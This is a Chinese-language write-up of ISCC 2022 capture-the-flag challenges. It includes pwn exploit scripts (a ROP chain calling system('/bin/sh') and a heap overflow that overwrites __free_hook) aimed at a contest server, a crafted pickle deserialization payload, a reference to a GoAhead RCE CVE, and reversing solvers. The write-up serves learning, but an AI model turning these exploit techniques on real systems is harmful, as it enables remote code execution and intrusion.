                    read_addr = u64(r(7)[-7:-1].ljust(8,b"\x00")) ;leak("read_addr",read_addr)
                    printf_addr = u64(r(7)[-7:-1].ljust(8,b"\x00"));leak("printf_addr",printf_addr)

                    
                    
                    """
                    puts_addr = u64(r(6).ljust(8,b"\x00")) ;leak("puts_addr",puts_addr);
                    data2 = r(0xf)
                    read_addr = u64(data2[-14:-8].ljust(8,b"\x00")) ;leak("read_addr",read_addr);rl()
                    printf_addr = u64(data2[-7:-1].ljust(8,b"\x00"));leak("printf_addr",printf_addr);rl()
                    #setbuf_addr = u64(r(7)[-7:-1].ljust(8,b"\x00"));leak("setbuf_addr",setbuf_addr)
                    """

                    #puts_addr = u64(data[])
                    libc = LibcSearcher('puts', puts_addr)
                    libc.add_condition("read", read_addr)
                    libc.add_condition("printf", printf_addr)
                    libc_base = puts_addr - libc.dump('puts')


                    print("######################## third ########################")
                    system_addr = libc_base + libc.dump('system')
                    bin_sh_addr = libc_base + libc.dump('str_bin_sh')
                    leak("system_addr",system_addr);leak("bin_sh_addr",bin_sh_addr)

                    rop = p64(next_read_ptr-0xe0)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr)
                    rop += p64(canary)*int(27 - 5)
                    #rop.ljust(0xe0-8,b"a")
                    buf = rop;canary = canary_int;rbp = next_read_ptr-0xe0;rip = leave_ret
                    s(buf + p64(canary) + p64(rbp) + p64(rip))


                    sh.interactive()


if __name__ == "__main__":
                    pwn("123.57.69.203",7020,0, remote_libc = 0 , local_libc=ELF("/lib/x86_64-linux-gnu/libc.so.6"))

跑脚本后得到flag

untidy_note

堆溢出漏洞,脚本如下:

from pwn import *
context(arch='amd64')

binary = './untidy_note'
r = remote('123.57.69.203',7030)
elf = ELF(binary)

libc = ELF('libc-2.27.so')

def Allocate(size=0x18):
    r.sendlineafter("CHOOSE\:\n",'1')
    r.sendlineafter("note size is:\n",str(size))
    print("1")

def Free(index):
    r.sendlineafter("CHOOSE:\n",'2')
    r.sendlineafter("index:\n\n",str(index))
    print("2")

def Edit(index,payload):
    r.sendlineafter("CHOOSE:\n",'3')
    r.sendlineafter("index:\n",str(index))
    r.sendlineafter("size is:\n",str(len(payload)))
    r.sendafter("Content:\n",payload)
    print("3")
def Show(index):
    r.sendlineafter("CHOOSE:\n",'4')
    r.sendlineafter("index:\n",str(index))
    print("4")
r.sendlineafter("NAMEIS:",'HN-影影卷起来了')
for i in range(26):
    Allocate(0x1f)
Allocate(0x8)#26
for i in range(26):
    Free(i)
Edit(26,b'a'*0x18+p32(0x11))
Allocate()
Allocate()
Show(1)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-998-10-libc.symbols['__malloc_hook']
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
success("system -> "+hex(system))
success("libc_base -> "+hex(libc_base))

Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)

Free(4)
Free(5)
Free(6)
Edit(6,p64(free_hook))
Allocate(0x1f)
Allocate(0x1f)
Edit(8,p64(system))
# print("success")
Allocate(0x18)
Edit(9,b'/bin/sh\x00')
Free(9)

r.interactive()

img

ISCC{af72-d61a-45d7-8845-0404}

mobile

MobileA

APK反编译

img

flag被分成了两段,先把R0ZacFlGeUNsT3Z5LzJuc0ltRHJhRTQrQS9TUDBxcjVxblMrL01iUHoxST0=base解密之后aes解密得到flag前半段,在这里发现偏移量和密钥

// Decompiled key material: each string literal is Base64-encoded (flags 0),
// newlines are removed from the result, and its UTF-8 bytes are kept.
// NOTE(review): presumably arrayOfByte3 ("K@e...") is the AES key and
// arrayOfByte2 ("I&V...") the IV — the Cipher call is not part of this excerpt.
// Constants compiled into the APK can be read by anyone who decompiles it,
// so they give the encrypted half of the flag no protection.
byte[] arrayOfByte3 = (new String(Base64.encode("K@e2022%%y".getBytes(StandardCharsets.UTF_8), 0))).replace("\n", "").getBytes(StandardCharsets.UTF_8);
  byte[] arrayOfByte2 = (new String(Base64.encode("I&V2022***".getBytes(StandardCharsets.UTF_8), 0))).replace("\n", "").getBytes(StandardCharsets.UTF_8);

密钥和偏移量进行base64编码后进行aes解密

img

然后

img

这个是cmd5解密得到flag后半段,组合得到ISCC{mb…o_jghgfTSAD_no}

MobileB

首先先将apk文件进行反编译得到伪代码得到重要信息

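/**
 * Checks the entered flag: at least 10 characters, wrapped in "ISCC{" ... "}",
 * and the inner part, passed through the native stringFromJNI and then a.a,
 * must equal the fixed digit string. Both helpers are defined outside this
 * excerpt. (The Markdown bold markers that had leaked into the listing are
 * removed so the method is valid Java again.)
 */
private boolean Jformat(String paramString) {
    if (paramString.length() < 10) {
        return false;
    }
    int last = paramString.length() - 1;
    return paramString.substring(0, 5).equals("ISCC{")
            && paramString.charAt(last) == '}'
            && a.a(stringFromJNI(paramString.substring(5, last))).equals("52405240520120520134034020134030120130");
}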

用apktool反编译得到so文件

分析得知,之间存在联系,exp如下

# Interactive solver: the digit string compared in Jformat is typed in first,
# followed by twelve strings recovered from the .so file.
a = input("RESUULT:")[:-1]  # the last typed character is dropped

# Each of the twelve strings is stored twice in a row, so that a search that
# starts at offset 26 can step back nine places without running off the front.
# presumably every string is a 26-letter alphabet — confirm against the .so
prompts = ("ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT",
           "NINE", "TEN", "ELENVE", "TWLVE")
doubled = [text * 2 for text in (input(label) for label in prompts)]

# Code table: the position of a code in n selects a letter of o.
n=[5,1,51,2,52,12,512,3,53,13,513,23,523,123,5123,4,54,14,514,24,524,124,5124,34,534,134,5134,234,5234,1234,51234]
codes = [int(token) for token in a.split("0")]
o="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
p = [o[n.index(code)] for code in codes]

# Order in which the twelve strings are used (third, twelfth, sixth, ...).
q = [doubled[slot] for slot in (2, 11, 5, 7, 6, 1, 3, 10, 0, 4, 8, 9)]

print("ISCC{",end='')
for r in range(12):
    row = q[r]
    print(row[row.index(p[r], 26) - 9], end='')
print('}')

擂台赛wp

MISC

666

img

是伪加密,把09改为00即可成功解压。

img

img

这个时候发现flag.rar这个压缩包也需要密码,所以拿这个图片下手,steghide扫描一下,发现一个密码为123456的high.png,查看分离的图片修改高度得到一堆字符,是压缩包密码!@#$%678()_+,然后得到pcap文件进行流量分析,追踪tcp得到一个网址,https://www.cnblogs.com/konglingdi/p/14998301.html

img

访问之后发现是个动图img

分析得到base64编码img

SElERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA==

解码得到HIDEkey:852 987456321 98423 98423 REALkey:xSxx

通过九宫格推出REALkey为ISCC

还有一个是

img

pQLKpP/EPmw301eZRzuYvQ==,aes解码,密码是ISCC,得到flag ISCC{lbwmeiyoukaig}

img

扫!

附件一堆图片–二维码掩码,转八进制之后得到新的压缩包,再次解压,里面是flag.txt,打开得到flag img

flag{S0_Many_qR}

真扫yoo

得到大量条形码,拿出来一个stegsolve看看信息

img

有提示,

53 56 4E 44 51 33 74 6A 4D 47 52 6C 4D 7A 6B 6D 59 7A 42 6B 5A 54 45 79 4F 47 46 33 59 58 30 3D

直接将每个图片的hex合起来,然后hex转字符串,再base64解码得到flag

img

img

ISCC{c0de39&c0de128awa}

WEB

Melody(赛后做出来,既然写了就不删了)

扫目录得到info,查看得到提示

?Melody={{config}}查询密钥

img

key:meldoy-is-so-cute-wawawa!

然后传入session发现代码

# -*- coding:utf-8 -*-
import pickle
import melody
import base64
from flask import Flask, Response,request

class register:
  """A name/password pair; two instances are equal when both fields match."""

  def __init__(self,name,password):
      self.name, self.password = name, password

  def __eq__(self, other):
      # Only an exact `register` instance can compare equal (subclasses and
      # other types never do).
      if type(other) is not register:
          return False
      if not (self.name == other.name):
          return False
      return self.password == other.password


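class RestrictedUnpickler(pickle.Unpickler):
  """Unpickler that resolves only an explicit allowlist of globals.

  The earlier check accepted every attribute of any module whose name merely
  started with '__main__'. That also exposes imported modules and other
  objects living in __main__, which a pickle stream can then modify. Here the
  module name must match exactly and the global must be on the allowlist;
  everything else raises pickle.UnpicklingError.
  """

  # The only __main__ global that legitimate payloads of this app reference.
  ALLOWED_MAIN_GLOBALS = frozenset({'register'})

  def find_class(self, module, name):
      if module == '__main__' and name in self.ALLOWED_MAIN_GLOBALS:
          return getattr(sys.modules['__main__'], name)
      raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))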

def find(s):
  # Deserialises the bytes in `s` with RestrictedUnpickler and returns the object.
  # NOTE(review): the caller passes request data straight in. pickle is not a
  # safe format for untrusted input even with a find_class filter; a data-only
  # format such as JSON would avoid the whole class of problems.
  return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/therealflag', methods=['GET','POST'])
def realflag():
  # POST: unpickle the 'melody' form field and compare the result with the
  # expected credentials. GET, or a POST that falls through, returns a sample
  # pickled `register` object, Base64-encoded.
  if request.method == 'POST':
      try:
          data = request.form.get('melody')
          # NOTE(review): this rejects any payload containing the byte 'R'
          # (the REDUCE opcode). It is a single-byte denylist on the raw
          # stream and leaves every other opcode usable; denylisting opcodes
          # does not make pickle safe for untrusted input.
          if b'R' in base64.b64decode(data):
              return 'no reduce'
          else:
              # NOTE(review): untrusted request data is unpickled here.
              result = find(base64.b64decode(data))
              if type(result) is not register:
                  return 'The type is not correct!'
          # Both comparisons must hold: against the values stored in the
          # `melody` module and against the literal pair ("melody", "hug").
          correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
          if correct:
              if session['username'] == 'admin':
                  return Response(read('./flag.txt'))
              else:
                  return Response("You're not admin!")
      except Exception as e:
          # NOTE(review): the exception text is sent back to the client,
          # which discloses internal details; log it and return a generic error.
          return Response(str(e))

  # Reached on GET and on a POST whose comparison failed.
  test = register('admin', '123456')
  data = base64.b64encode(pickle.dumps(test)).decode()
  return Response(data)

pickle反序列化覆盖melody模块的变量(find_class放行了__main__下的任意属性,而只过滤R操作码拦不住其它操作码),exp如下

import base64

data=b'''c__main__
melody
(S'name'
S"melody"
S"hug"
S"1"
db0(c__main__
register
S"melody"
S"hug"
o.
'''
print(base64.b64encode(data))
b'Y19fbWFpbl9fCm1lbG9keQooUyduYW1lJwpTIm1lbG9keSIKUyJodWciClMiMSIKZGIwKGNfX21haW5fXwpyZWdpc3RlcgpTIm1lbG9keSIKUyJodWciCm8uCg=='

img

然后传入得到flag

ISCC{2022_melody_secrets}

Ping2rce

GoAhead环境变量注入。CVE-2021-42342 GoAhead 远程命令执行漏洞

这里先尝试本地得到回显

img

劫持ping执行过程中环境变量注入

img

得到flag ISCC{c1522169-7dcvd499-4add960-9ad36-8b2a5f2f7}

RE

easyre

去花指令后得到main函数

img

这三个函数分别异或 ,最后和比较^<L^<LX:LX.MJ.MJ9PJ9VF$VF$T@$T]`

# The 9-character key is used as three 3-character pieces, one per stage.
key = 'enc!@#key'
temp = '^<L^<LX:LX.MJ.MJ9PJ9VF$VF$T@$T];'

xor_tail, sub_mid, xor_head = key[6:9], key[3:6], key[0:3]

flag = [ord(char) for char in temp]
print(flag)

# Stage 1: XOR with the last key piece, cycling every three positions.
flag = [value ^ ord(xor_tail[pos % 3]) for pos, value in enumerate(flag)]
print(1)

# Stage 2: subtract the middle key piece.
flag = [value - ord(sub_mid[pos % 3]) for pos, value in enumerate(flag)]
print(2)

# Stage 3: XOR with the first key piece.
flag = [value ^ ord(xor_head[pos % 3]) for pos, value in enumerate(flag)]
print(3)

print(''.join(map(chr, flag)), end='')

img

ISCC{qwqqwqwqqwereerereeroiooioiooipp}

Encode

反编译审计

img

这个是先对data xor处理之后去获取密钥然后模运算(模同),exp如下

#coding=utf-8
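def getInv(a,mod):
  """Return the inverse of a modulo mod, or -1 when gcd(a, mod) is not 1.

  The previous version expected a helper to hand the Bezout coefficient back
  through its x argument. Python passes ints by value, so x stayed 0 and the
  function returned 0 for every invertible input. The coefficient is now
  computed here with the iterative extended Euclidean algorithm.
  """
  prev_r, cur_r = a, mod
  prev_x, cur_x = 1, 0
  while cur_r:
      quotient = prev_r // cur_r
      prev_r, cur_r = cur_r, prev_r - quotient * cur_r
      prev_x, cur_x = cur_x, prev_x - quotient * cur_x
  if prev_r != 1:
      return -1
  # Normalise into the range 0 .. mod-1.
  return prev_x % mod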

def exgcd(a,b,x,y):
  """Return gcd(a, b) by Euclid's algorithm.

  x and y are accepted for signature compatibility only: whatever is assigned
  to them inside the function never reaches the caller, so the return value
  is the only result.
  """
  while b:
      a, b = b, a % b
  return a

# Toy RSA-style parameters: key[0] and key[1] are the two primes (7 and 11),
# key[2] the exponent (13), key[3] their product and key[4] = (p-1)*(q-1).
key =[0]*10
key[0],key[1],key[2] =[0x7,0xb,0xd]
key[3] = key[1] * key[0]
key[4] = (key[1] - 1) * (key[0] - 1)
# key[5] is meant to be the inverse of the exponent; nothing below reads it,
# because the plaintext values are found by exhaustive search instead.
key[5] = getInv(key[2], key[4])
print (key)
# print the key values

data=[0]*24

# Target values, one per flag character.
t=[0x23,0x4A,0x7,0x2B,0x1D,0x6,0x3F,0x36,0x36,0x2B,0x5,0x7,0x6,0x39,0x2,0x6,0x38,0x21,0x4B,0x1A,0x2D,0x2D,0x39,0x2]
#t='0x363F061D2B074A230x0602390607052B360x02392D2D1A4B2138'
# For each target take the first j in 1..999 with j**key[2] mod key[3] == t[i].
for i in range(24):
  for j in range(1,1000):
      if t[i]==pow(j,key[2],key[3]):
          data[i] = j
          break

print (data)
# print the recovered values

# begin reconstructing the flag: add 70, then XOR with 0x3f
for i in range(len(data)):
  data[i]+=70
  data[i]^=0x3f

# Reverse the list in place with XOR swaps of data[i] and data[len_-i-1].
# NOTE(review): i starts at 12, so the middle pair (11, 12) is swapped at
# i=12 and swapped back at i=11; every other pair is swapped once. Confirm
# whether the binary does the same or the range should start one lower.
len_=len(data)
for i in range((len(data)%2+len(data))//2,-1,-1):
  data[len_-i-1]^=data[i]
  data[i]^=data[len_-i-1]
  data[len_-i-1]^=data[i]

# Final XOR with 0xf gives the characters.
flag=''
for i in range(len_):
  flag+=chr(data[i]^0xf)

print (flag)
# print the flag
# 输出flag

img

ISCC{PWN_ISR_EALLY_HARD}

Self-Reverse

分析一下伪代码

img

需要动态调试一下,关键代码如下

img

exp如下

# Target bytes taken from the debugger session.
t = [250,12,229,250,145,157,100,166,108,250,247,145,12,12,99,142]

# Brute-force the byte substitution. In the original expression the
# (v34 >> 8) term is added and subtracted again, so the comparison comes down
# to the low byte of 3*j + 1.
t1 = [0] * 16
for slot, wanted in enumerate(t):
    for j in range(256):
        v34 = 3 * j + 1
        if v34 & 0xff == wanted:
            t1[slot] = j
            break
        if j == 127:
            # Marker printed when no match was found in the first 128 candidates.
            print(j)
print(t1)

# Undo the position shuffle: the value stored at index i ^ 0xd belongs at (i + 1) % 16.
flag = [0] * 16
for i in range(16):
    flag[(i + 1) % 16] = t1[i ^ 0xd]

print(''.join(chr(code) for code in flag), end='')

img

ISCC{LYY/vSy0R407!YSS}

rerere

看了伪代码之后发现还是动态调试–下断点

img

调试的图失踪了,附件也召唤不到了,exp如下:

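# Two byte tables dumped while debugging; only the even indexes carry data
# (every second byte is 0x00 except at the very end of XXX).
CCC=[0xD7, 0x00, 0xB5, 0x00, 0xB8, 0x00, 0x7A, 0x00, 0x47, 0x00,
0x8B, 0x00, 0x46, 0x00, 0xFF, 0x00, 0x5C, 0x00, 0xB5, 0x00,
0x04, 0x00, 0x32, 0x00, 0xE3, 0x00, 0x5A, 0x00, 0x7B, 0x00,
0x28, 0x00, 0x30, 0x00, 0x2D, 0x00, 0x5A, 0x00, 0xF3, 0x00,
0x59, 0x00, 0x59, 0x00, 0xA4, 0x00, 0x54, 0x00, 0xC8, 0x00,
0x79, 0x00, 0xA2, 0x00, 0xDC, 0x00, 0x6F, 0x00, 0x74, 0x00,
0x1F, 0x00, 0x9D]
XXX=[0x9E, 0x00, 0xE6, 0x00, 0xFB, 0x00, 0x39, 0x00, 0x3C, 0x00,
0xEA, 0x00, 0x24, 0x00, 0x9C, 0x00, 0x38, 0x00, 0xD0, 0x00,
0x62, 0x00, 0x55, 0x00, 0x8B, 0x00, 0x33, 0x00, 0x11, 0x00,
0x43, 0x00, 0x5C, 0x00, 0x40, 0x00, 0x34, 0x00, 0x9C, 0x00,
0x29, 0x00, 0x28, 0x00, 0xD6, 0x00, 0x27, 0x00, 0xBC, 0x00,
0x0C, 0x00, 0xD4, 0x00, 0xAB, 0x00, 0x17, 0x00, 0x0D, 0x00,
0x65, 0x00, 0xE0, 0x00]

# The listing had an unterminated string literal here (flag='), which made the
# whole script a syntax error. The flag is now built by XOR-ing the two tables
# at every even index and printed once.
flag = ''.join(chr(XXX[i] ^ CCC[i]) for i in range(0, len(XXX), 2))
print(flag, end="")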

img

ISCC{abcdefghijklmnopqrstuvwxyz}

MOBILE

Easy Mobile

反编译头部设卡,改成35得到伪代码

img

得到关键代码

img

分析主体逻辑

// Decompiled activity setup: inflates the layout, looks up the button (n) and
// the text field (o) by resource id, and attaches the click listener class `a`.
// The numeric ids are the decompiler's rendering of R.layout / R.id constants.
public final void onCreate(Bundle paramBundle) {
  super.onCreate(paramBundle);
  setContentView(2131427356);
  this.n = (Button)findViewById(2131230808);
  this.o = (EditText)findViewById(2131230872);
  this.n.setOnClickListener(new a(this));
}
 
/**
 * Decompiled click listener for the activity's button. The decompiler dropped
 * the declaration of the field {@code a} (the owning MainActivity) and the
 * constructor body that would assign it, so this listing does not compile
 * as shown.
 */
public final class a implements View.OnClickListener {
  public a(MainActivity this$0) {}

  /**
   * Copies the current EditText content into the activity's {@code p} field.
   * No comparison or check happens in this method.
   */
  public final void onClick(View param1View) {
    this.a.p = this.a.o.getText().toString();
  }
}
}

得到flag

ISCC{W72Eb7Lf9CecO-9M87Ed-T46O4fD-bL23U0-SaaEe5C87dc2540}

Mobile Analysis

反编译得到代码,审计之后梳理主体逻辑,看到a.class

img

参数写码表,然后再看c.class

AjmBCL7DHxIMl4P5Wa=uzvt0ZTfpnoRSJNO9/QYqrsb2U1cdeEFGVXy3ghikKw68

执行得到结果。

class b的逻辑分析之后解密得到答案,最后Main activity解密排序之后得到flag

好玩的?是新语言哦

刚开始同第一个,设卡改值,逆出代码,找到重要代码ISCC

img

加密逻辑如下

// Decompiled loop over arrayOfByte1: each byte is read as one ASCII hex digit
// and converted to its numeric value (lower-case digits only). This is a
// decoding step rather than a cipher.
// NOTE(review): the excerpt stops before the loop's closing brace, so how the
// resulting paramInt is used afterwards is not visible here.
for (j = 0; j < k; j++) {
  byte b = arrayOfByte1[j];
  // 97..102 are the ASCII codes of 'a'..'f'. paramInt is first used as a
  // boolean flag and then reused for the digit value (decompiler artifact).
  if (97 <= b && b < 103) {
    paramInt = 1;
  } else {
    paramInt = 0;
  } 
  if (paramInt != 0) {
    // 'a'..'f' -> 10..15
    paramInt = b - 87;
  } else {
    // 48..57 are the ASCII codes of '0'..'9'.
    if (48 <= b && b < 58) {
      paramInt = 1;
    } else {
      paramInt = 0;
    } 
    if (paramInt != 0) {
      // '0'..'9' -> 0..9
      paramInt = b - 48;
    } else {
      // Any other byte, including upper-case 'A'..'F', maps to 0.
      paramInt = 0;
    } 
  }

理清主体逻辑

// Decompiled view-binding setup. Intrinsics.throwUninitializedPropertyAccessException
// is the helper the Kotlin compiler emits when a lateinit property is read before
// it has been assigned, so each null test below guards an access to viewBinding.
// NOTE(review): the assignments to the temporaries (activityMainBinding1/2/3) are
// outside this excerpt, and the second if block is cut off before its closing brace.
if (activityMainBinding3 == null) {
  Intrinsics.throwUninitializedPropertyAccessException("viewBinding");
  activityMainBinding1 = null;
} 
// Use the binding's root view as the activity content.
setContentView((View)activityMainBinding1.getRoot());
activityMainBinding1 = this.viewBinding;
if (activityMainBinding1 == null) {
  Intrinsics.throwUninitializedPropertyAccessException("viewBinding");
  activityMainBinding1 = activityMainBinding2;

之后得到flag(flag找不到了,这是赛后才写的这道题的wp)

解题收获

79名

image-20230125194455970

​ 首先不论是什么类型的题目,我发现最重要的还是基础,要掌握好基础知识才能在比赛过程中得心应手,其次就是脑洞要扩散点,不能太狭隘,思路要敢想!敢做!

做web题目的时候更是考验基础,这些web题目都比较综合,一个题可能要打很多组合拳才能成功解出,其次还有就是多利用网络,多搜多找多学。

​ misc题目的话更是最需要扩散思维的,真的很多题目在写的时候想不到会这样,在反复思考和尝试之后成功解出来的时候真的是恍然大悟,也能感觉到自己的思路没有打开,所以在misc题目的时候要丰富想象力。

​ reverse题目和pwn题目关系比较密切,这类题型比较考察底层编程能力,同时还有就是调试,静动态,以及下断点等等基础本领,同时需要仔细地审计代码之间的逻辑关系,发现相应破绽然后写出对应脚本

​ 最后这个mobile,之前不咋涉及这方面但是通过这次比赛,真的是又学习到了很多,首先就是这个反编译出代码的能力,以及apktool,dex2jar-2.0,jd-gui-windows-1.6.6这三个软件的熟练运用,在解这方向题目的时候第一步基本都是反编译出代码,然后就是考验审计能力了,其大致后面的解法基本和reverse就相似了。

​ 通过这次iscc长达二十五天的比赛,让我学到了很多,其中mobile这个领域更是受益匪浅,同时让我见到了很多之前没有见过的题型,对于自己的技术可以说是提高了不少!
